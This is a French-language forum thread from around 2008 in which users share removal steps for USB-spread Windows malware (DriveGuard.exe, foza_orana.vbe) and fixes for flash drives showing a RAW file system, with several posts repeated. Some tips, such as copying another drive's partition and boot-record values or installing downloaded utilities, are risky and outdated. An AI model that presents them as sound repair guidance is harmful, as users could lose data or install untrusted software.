BON COURAGE A TOUS
Io Raphael raha mety @ an'i toi a, enga anie.
Comme je l'ai dit, ce sont mes flash disk qui sont infectés par DriveGuard.exe.
Après avoir cherché sur le net, j'ai lu un truc qui consistait à récupérer un disque dur à l'aide d'un outil présent dans Partition Magic (PTEDIT32.EXE).
Voici ce que j'ai fait, je le répète, CE SONT DES FLASHS DISKS QUI SONT INFECTES POUR MOI (le système de fichier est devenu RAW, impossible de faire des copies, impossible d'ouvrir les fichiers):
1- J'ai connecté un flash disk SAIN de même taille que celui qui est infecté. Il faut au préalable supprimer tout ce qu'il contient pour qu'il soit VIERGE.
2- Je lance PTEDIT32.EXE qui se trouve dans le répertoire de Partition Magic
3- Je sélectionne LE FLASH DISK dans la zone Hard Disk
4- Je fais un ImprEcran (Imprime Ecran) du tableau qui s'affiche
5- Je sauve cet image sur le Bureau pour que je puisse y accéder rapidement
6- Je clique maintenant sur Boot Record (un bouton en bas de la fenêtre de PTEDIT32)
7- Je fais aussi un ImprEcran de la fenêtre qui s'affiche, je sauve aussi sur mon Bureau
8- Je DECONNECTE LE FLASH SAIN
9- Je CONNECTE LE FLASH DETRUIT
10- J'ouvre les images enregistrés sur mon bureau.
11- J'applique les valeurs se trouvant sur ces images pour mon flash détruit.
12- Le flash redevient normal MAIS IL NE FAUT SURTOUT PAS KLE FORMATER. CONTENTEZ VOUS DE SUPPRIMER SEULEMENT LES FICHIERS QU'IL CONTIENT MAIS PAS DE FORMATAGE SINON LE SYSTEME DE FICHIER REDEVIENDRA RAW
BON COURAGE A TOUS
Io Raphael raha mety @ an'i toi a, enga anie.
kakashi_sensei
>
Samy010976
Messages postés
16
Date d'inscription
lundi 28 février 2005
Statut
Membre
Dernière intervention
14 avril 2009
16 nov. 2008 à 07:41
16 nov. 2008 à 07:41
Salut!
pour ton problème concernant système de fichier qui est devenu raw voici la solution :
Il sera judicieux dans un premier temps de vérifier quel est le système de fichiers associé au disque dur en question.
1. Cliquer sur l'icône "Poste de Travail",
2. Cliquer droit sur le disque dur en question, choisir l'option "Propriétés" du menu contextuel,
3. Dans l'onglet "Général", vérifier le système de fichiers.
Si celui-ci (FAT32 ou NTFS) est nommé RAW (en anglais RAW signifie "brut", "non dégrossi" ), alors la procédure suivante devrait permettre d'accéder de nouveau au disque et à ses données.
* Les préparatifs :
Nous aurons besoin d'accéder à l'onglet "Sécurité" des propriétés du disque dur. Cet onglet est désactivé dans Windows XP Professionnel, mais activable. Par contre, sous Windows XP Edition familiale, il faut ajouter cette fonction.
- Sous Windows XP Professionnel :
1. Ouvrir le "Poste de Travail",
2. Cliquer sur le menu "Outils", puis "Options des Dossiers...",
3. Aller dans l'onglet "Affichage", puis décocher l'option "Désactiver le partage de fichiers simple (recommandé)" (section "Paramètres avancés" ),
4. Valider les changements.
- Sous Windows XP Edition familiale :
Comme indiqué plus haut, cette fonction n'est pas implémentée.
On téléchargera l'utilitaire suivant pour l'installer :
http://www.faqxp.com/f/i/ntfs.exe
1. Décompresser l'utilitaire,
2. Dans le répertoire de décompression, sélectionner le fichier Setup.INF,
3. Cliquer droit, et sélectionner "Installer" dans le menu contextuel,
4. Une boîte de dialogue propose de remplacer le fichier Esent.DLL : Il faut refuser en cliquant sur <Non pour tous>.
Cliquer sur <Oui> peut rendre le système instable.
5. Redémarrer le PC.
* Où l'on passe aux choses sérieuses !
1. Cliquer sur l'icône "Poste de Travail",
2. Cliquer droit sur le disque dur en question, choisir l'option "Propriétés" du menu contextuel,
3. Dans l'onglet "Sécurité", cliquer sur "Ajouter", puis "Avancé", et, enfin, sur "Rechercher",
4. Dans la liste qui s'affiche, cliquer sur le nom qui apparaît dans la colonne "Nom (RDN)",
5. Valider en cliquant deux fois sur <OK>.
6. Dans l'onglet "Sécurité", sélectionner le nom d'utilisateur, et cocher "Autoriser" (en face de "Contrôle total" ),
7. Cliquer sur le bouton "Paramètres avancés...", cocher la case "Remplacer les entrées d'autorisations de tous les objets entrants par les entrées affichées ici et qui s'appliquent aux objets entrants",
8. Valider en cliquant deux fois sur <OK>,
9. Redémarrer le PC.
Le disque devrait de nouveau apparaître avec un système de fichiers NTFS, et les données devraient être de nouveau accessibles.
Après redémarrage de ton ordi, tout devrait être en ordre.
Pour ton problème concernant driveguard.exe, il faut que tu arrête d'abord son processus dans le gestionnaire des tâches, il est préférable que tu utilises le gestionnaire de processus de tuneup utilities, il est mieux car tous les processus actifs sont détaillée. tu pourras facilement décelé le processus de driveguard.
lorsque tu l'ait arrêté, il faut que tu affiches tes fichiers cachés et supprime le dossier flashguard dans C:\Program Files.
J'espère que ça t'a aidé;
pour ton problème concernant système de fichier qui est devenu raw voici la solution :
Il sera judicieux dans un premier temps de vérifier quel est le système de fichiers associé au disque dur en question.
1. Cliquer sur l'icône "Poste de Travail",
2. Cliquer droit sur le disque dur en question, choisir l'option "Propriétés" du menu contextuel,
3. Dans l'onglet "Général", vérifier le système de fichiers.
Si celui-ci (FAT32 ou NTFS) est nommé RAW (en anglais RAW signifie "brut", "non dégrossi" ), alors la procédure suivante devrait permettre d'accéder de nouveau au disque et à ses données.
* Les préparatifs :
Nous aurons besoin d'accéder à l'onglet "Sécurité" des propriétés du disque dur. Cet onglet est désactivé dans Windows XP Professionnel, mais activable. Par contre, sous Windows XP Edition familiale, il faut ajouter cette fonction.
- Sous Windows XP Professionnel :
1. Ouvrir le "Poste de Travail",
2. Cliquer sur le menu "Outils", puis "Options des Dossiers...",
3. Aller dans l'onglet "Affichage", puis décocher l'option "Désactiver le partage de fichiers simple (recommandé)" (section "Paramètres avancés" ),
4. Valider les changements.
- Sous Windows XP Edition familiale :
Comme indiqué plus haut, cette fonction n'est pas implémentée.
On téléchargera l'utilitaire suivant pour l'installer :
http://www.faqxp.com/f/i/ntfs.exe
1. Décompresser l'utilitaire,
2. Dans le répertoire de décompression, sélectionner le fichier Setup.INF,
3. Cliquer droit, et sélectionner "Installer" dans le menu contextuel,
4. Une boîte de dialogue propose de remplacer le fichier Esent.DLL : Il faut refuser en cliquant sur <Non pour tous>.
Cliquer sur <Oui> peut rendre le système instable.
5. Redémarrer le PC.
* Où l'on passe aux choses sérieuses !
1. Cliquer sur l'icône "Poste de Travail",
2. Cliquer droit sur le disque dur en question, choisir l'option "Propriétés" du menu contextuel,
3. Dans l'onglet "Sécurité", cliquer sur "Ajouter", puis "Avancé", et, enfin, sur "Rechercher",
4. Dans la liste qui s'affiche, cliquer sur le nom qui apparaît dans la colonne "Nom (RDN)",
5. Valider en cliquant deux fois sur <OK>.
6. Dans l'onglet "Sécurité", sélectionner le nom d'utilisateur, et cocher "Autoriser" (en face de "Contrôle total" ),
7. Cliquer sur le bouton "Paramètres avancés...", cocher la case "Remplacer les entrées d'autorisations de tous les objets entrants par les entrées affichées ici et qui s'appliquent aux objets entrants",
8. Valider en cliquant deux fois sur <OK>,
9. Redémarrer le PC.
Le disque devrait de nouveau apparaître avec un système de fichiers NTFS, et les données devraient être de nouveau accessibles.
Après redémarrage de ton ordi, tout devrait être en ordre.
Pour ton problème concernant driveguard.exe, il faut que tu arrête d'abord son processus dans le gestionnaire des tâches, il est préférable que tu utilises le gestionnaire de processus de tuneup utilities, il est mieux car tous les processus actifs sont détaillée. tu pourras facilement décelé le processus de driveguard.
lorsque tu l'ait arrêté, il faut que tu affiches tes fichiers cachés et supprime le dossier flashguard dans C:\Program Files.
J'espère que ça t'a aidé;
rayoune
Messages postés
245
Date d'inscription
mercredi 24 mars 2004
Statut
Membre
Dernière intervention
1 février 2024
15
20 août 2008 à 08:33
20 août 2008 à 08:33
Pourquoi ne pas l'arreter et le supprimer dans Program files
Il y a quelqu'un ?
salut gasy kely et à tous. oui il y a quelqu un et meme des tas de gens mais dis moi as tu aussi un souci avec ton pc? moi c'est a cause de ça que je me suis retrouvé là mais c'est cool car ici on s'entraide et sans rien demander en contrepartie alors merci à tous et essayer tjr de rester en contact. respect à tous les malagasy et que la force soit avec vous huhu et pour ceux qui crée ces virus que la rancune de tous ceux qui n ont pas les moyen de lutter contre soit sur et aussi le mauvais oeil on vous emmm.......
FOZA ORANA.vbe ou les icônes de votre bureau disparaissent
I/ Comment supprimer le virus
===================
1- Installez Windows optimum
2- Lancez Windows optimum
3- Dans le menu "File" à gauche, allez dans "Disque Local(C:ouD:ou lettre maj)\WINDOWS\system32, puis chercher le fichier appelé "foza_orana.vbe" en faisant apparaître la liste à gauche de la fenêtre. Une fois le fichier trouvé, sélectionnez-le puis cliquez sur "add "
4- Dans "Process" cocher la case qui correspond à "wscript.exe", puis cliquez sur "add" comme précédemment
5- Enfin, dans "Exécution", cliquez sur "Do list" en bas à droite de la fenêtre de Windows optimum et fermez tout.
La petite bestiole est finalement supprimée, mais votre bureau ne s'affiche pas encore correctement, Restaurez le système.
II/ Comment restaurer le système
====================
1- Téléchargez "Zeb-Restore",
2- Cochez toutes les cases, une fois ceci terminé, cliquez sur "Restaurer";
3- Attendez quelques secondes. Une fenêtre de confirmation apparaît : "Les éléments sélectionnés ont été bien restaurés", Cliquez sur OK.
Rebootez votre PC....Surprise! Les icônes de votre bureau réapparaissent. Mission accomplie lol
III/ Mesures préventives
==============
Ce type de virus se propage à travers les clés USB. Pour diminuer les risques d'infection, installez le logiciel USB.Disk.Security.
I/ Comment supprimer le virus
===================
1- Installez Windows optimum
2- Lancez Windows optimum
3- Dans le menu "File" à gauche, allez dans "Disque Local(C:ouD:ou lettre maj)\WINDOWS\system32, puis chercher le fichier appelé "foza_orana.vbe" en faisant apparaître la liste à gauche de la fenêtre. Une fois le fichier trouvé, sélectionnez-le puis cliquez sur "add "
4- Dans "Process" cocher la case qui correspond à "wscript.exe", puis cliquez sur "add" comme précédemment
5- Enfin, dans "Exécution", cliquez sur "Do list" en bas à droite de la fenêtre de Windows optimum et fermez tout.
La petite bestiole est finalement supprimée, mais votre bureau ne s'affiche pas encore correctement, Restaurez le système.
II/ Comment restaurer le système
====================
1- Téléchargez "Zeb-Restore",
2- Cochez toutes les cases, une fois ceci terminé, cliquez sur "Restaurer";
3- Attendez quelques secondes. Une fenêtre de confirmation apparaît : "Les éléments sélectionnés ont été bien restaurés", Cliquez sur OK.
Rebootez votre PC....Surprise! Les icônes de votre bureau réapparaissent. Mission accomplie lol
III/ Mesures préventives
==============
Ce type de virus se propage à travers les clés USB. Pour diminuer les risques d'infection, installez le logiciel USB.Disk.Security.
slt a tous
moi aussi etait attraper cradle et je l'ai metrisé , 2 semaines plus tard il revient avec cette priere ridicul
et je ne le trouve nul par
j'ai plus de buraeu, arrêté, tout est bloqué par l'administrateur
qulqu'un pourrait m'aider svp
moi aussi etait attraper cradle et je l'ai metrisé , 2 semaines plus tard il revient avec cette priere ridicul
et je ne le trouve nul par
j'ai plus de buraeu, arrêté, tout est bloqué par l'administrateur
qulqu'un pourrait m'aider svp
dites?eske ce virus a une progression ou je sais pas un truc comme ça parce que chaque fois que je démarre mon ordi, y'a écrit sur le fichier bloc-note il vous reste 9 démarrages à vivre et le nombre de démarrage diminue chaque fois.Je ne me retrouve plus, il renomme aussi les fichiers. A l'aide!!!!
